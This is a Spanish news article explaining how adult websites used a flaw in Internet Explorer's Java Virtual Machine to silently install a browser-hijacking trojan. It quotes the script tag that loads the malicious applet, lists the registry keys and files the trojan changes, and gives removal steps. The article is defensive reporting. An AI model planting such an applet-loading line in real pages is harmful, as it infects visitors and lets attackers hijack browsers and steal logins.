La actualidad - Mundo Digital

Your browser does not support inline frames or is currently configured not to display inline frames.

TODAS LAS NOTICIAS DE ESTE MES

INDICE ANUAL DE NOTICIAS PUBLICADAS

LOS INFORMES ESPECIALES DE NOTICASDOT.COM

SUSCRIPCION A NOTICIASDOT.COM

Paginas porno infectan a visitantes con Troyanos

Es la nueva moda. Aprovechando un error en de seguridad en la maquina Java de Microsoft, el autor de la pagina web modifica el comportamiento del navegador y cambia la configuración del registro del sistema.

Angel Cortés - Los sitios de contenidos para adultos son una de las "victimas" más importantes de los sistemas de intercambios de ficheros. En eMule, eDonkey, Kazaa, Morpheus, los usuarios pueden encontrar de todo sin pagar ni un euro y sitios web Web que hasta ahora obtenían suculentos beneficios con las cuotas se encuentran cada vez con menos ingresos.

Algunos, los más serios, que también los hay en este negocio, siguen manteniendo su negocio con contenidos de calidad y exclusivos. No les va mal, aunque reconocen que los P2P les ha afectado. Los otros, la gran mayoría, no paran de "investigar" para arrancar lo que sea del usuario incauto que desconoce en muchas ocasiones por donde pisa.

Estos fueron los inventores del famoso código que impide cerrar las páginas, o mejor dicho que crean un bucle infinito cada vez que lo intentamos, hasta que finalmente consiguen colgar el equipo.

También inventaron sistemas engañosos, escondiendo dialers en aplicaciones para visualizar ficheros, principalmente imágenes o videos, que se activaban cuando el usuario daba autorización para instalar esa herramienta en el PC.

Ahora han descubierto la gran oportunidad que representa una vulnerabilidad en la Máquina Virtual de Java del Internet Explorer, instalando de forma totalmente transparente un troyano en el equipo que modificará ciertas configuraciones del registro y el comportamiento del navegador.

Este troyano, insertado en un applet de Java, se activa sin la intervención del usuario, cuando éste visita una página Web o un correo electrónico con formato HTML que lo incluya en su interior.

La presencia de este applet en el código de la pagina es desconocida por el usuario por lo que su única solución es actualizar la Microsoft Virtual Machine (todas las versiones anteriores a la 3809, incluida esta, presentan el fallo) con uno de los updates de seguridad que Microsoft dispone en su sitio.

¿Que sucede?

Una vez visitada la pagina, el applet se carga en memoria y empieza a actuar.

Cambia la configuración del Internet Explorer, de modo que su página de inicio y las opciones de búsqueda son redirigidas a una página proporcionados por él, modificando para ello algunos componentes del Registro del Sistema:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Use Search Asst = [valor proporcionado por el troyano]
Search Page = [valor proporcionado por el troyano]
Start Page = [valor proporcionado por el troyano]
Search Bar = [valor proporcionado por el troyano]

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search
SearchAssistant = [valor proporcionado por el troyano

Modificados estos parámetros, si escribimos una url, sin el "http" automáticamente aparecemos en la página que nos han insertado en nuestro registro. Una página que, además, suele incluir el applet, además de sistemas de identificación del usuario para robar "logins" y passwords cuando se trata de acceso a páginas que lo pidan.

Aún más peligro

Sin embargo, el peligro puede ir mucho más lejos

En algunas de las paginas localizadas hemos encontrado nuevos applets que instalan ficheros en el sistema y modifican otros existentes, como el "hosts" para que cuando pulsemos unas urls determinadas seamos redirigidos a otros lugares que le interesen al creador del troyano.

Por último, también modifica unos flags en el registro, evitando que podamos modificar o bloquear a mano, a través del panel de herramientas, las modificaciones introducidas.

Rusos y americanos a la una

Uno de los lugares donde podemos encontrar el código es en "defaultsearch.net". Si miramos el código fuente de esta pagina veremos lo siguiente:

"<script>document.writeln('<APPLET ARCHIVE="archive2.jar" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></APPLET>');</script>"

Siendo este applet el que se encargará de modificar el comportamiento de nuestro navegador, colocándonos como pagina de inicio y de búsqueda este enlace.

En apariencia, "Defaultsearch" es un buscador "convencional" que ofrece, como valor añadido, la búsqueda a sitios "no censurados". Para ello utiliza el "motor" de "coolwebsearch", una empresa radicada en Estados Unidos y enfocada al sector de contenidos para adultos.

El mismo applet incluido en Defatultsearch podemos encontrarlo en otras páginas de la factoría de "Vadim Fedorov", un ruso afincado en Praga, y que abarcan casi todos los temas de la pornografía. Además, este prolífico empresario, mantiene un sitio de venta de contenidos para otros sites (www.nevest.net/), elaboración y comercialización de "dialers" y hasta servicios de alojamiento de páginas Web, correo electrónico o registro de dominios

Vamos para confiar en su privacidad

Como deshacernos del troyano

1. Actualizar la Versión de la Maquina Java

En primer lugar, más vale prevenir que curar, debemos comprobar cual es la versión de nuestra máquina Java. Para ello debemos abrir una ventana MS-DOS,y teclear: JVIEW, despues de ello, le damos al enter.

En la parte superior nos aparecerá un texto que dira: "Cargador de línea de comandos de Microsoft (R) para Java Versión 5.00.xxxx", donde xxxx es la versión actual. Debemos actualizarla a la versión 3810, si el número que nos aparece es inferior.

Para ello acudiremos a Microsoft a uno de los siguientes enlaces: http://www.microsoft.com/technet/security/bulletin/ms03-011.asp o al http://windowsupdate.microsoft.com/

2. Borrado manual de los archivos creados por el gusano

Comrpueba si tienes algunos de estos ficheros en su ordenador. Si es así, eliminalos

c:\windows\s.htm
c:\windows\hosts
c:\windows\system32\drivers\etc\hosts
c:\windows\favoritos\Nude Nurses.url
c:\windows\favoritos\Search You Trust.url
c:\windows\favoritos\Your Favorite Porn Links.url

Una vez borrados vamos a la "Papelera de reciclaje" en el escritorio, y seleccionamos "Vaciar la papelera de reciclaje".

3. Editamos el registro

Ejecutamos el editor de registro: Inicio, ejecutar, escribimos REGEDIT y pulsamos ENTER

Miramos los valores que nos ofrecen los siguientes registros:

HKEY_CURRENT_USER

HKCU\Software\Microsoft\Internet Explorer\Main\Search Page
HKCU\Software\Microsoft\Internet Explorer\Main\Search Bar
HKCU\Software\Microsoft\Internet Explorer\Main\SearchAssistant
HKCU\Software\Microsoft\Internet Explorer\Main\CustomizeSearch

HKEY_LOCAL_MACHINE

HKLM\Software\Microsoft\Internet Explorer\Main\Search Page
HKLM\Software\Microsoft\Internet Explorer\Main\Search Bar
HKLM\Software\Microsoft\Internet Explorer\Main\SearchAssistant
HKLM\Software\Microsoft\Internet Explorer\Main\CustomizeSearch
HKLM\Software\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix

Eliminando aquellas direcciones, no la clave del registro que nos sean sospechosas o que no no correspondan con Microsoft.

Finalmente reiniciamos el ordenador y teóricamente ya hemos conseguido deshacernos de él.

Noticias relacionadas

Tiempo libre + PC + Internet + e-mails = caldo de cultivo de los virus para propagarse

Biblioteca del Conocimiento: Documentos y Estudios sobre Mundo Digital y Mundo Digtal España

domingo, 25 mayo 2014

(c) Noticiasdot.com

Editor Angel Cortés - Redactor Jefe: Pablo Ruisánchez
Director Técnico: Javier Lavandeira
Direcciones de correo electrónico: Redacción - Información - Publicidad - ¿Quienes somos'
Avda. Paral.lel 116 - 08015 Barcelona - tel 933292539

privacy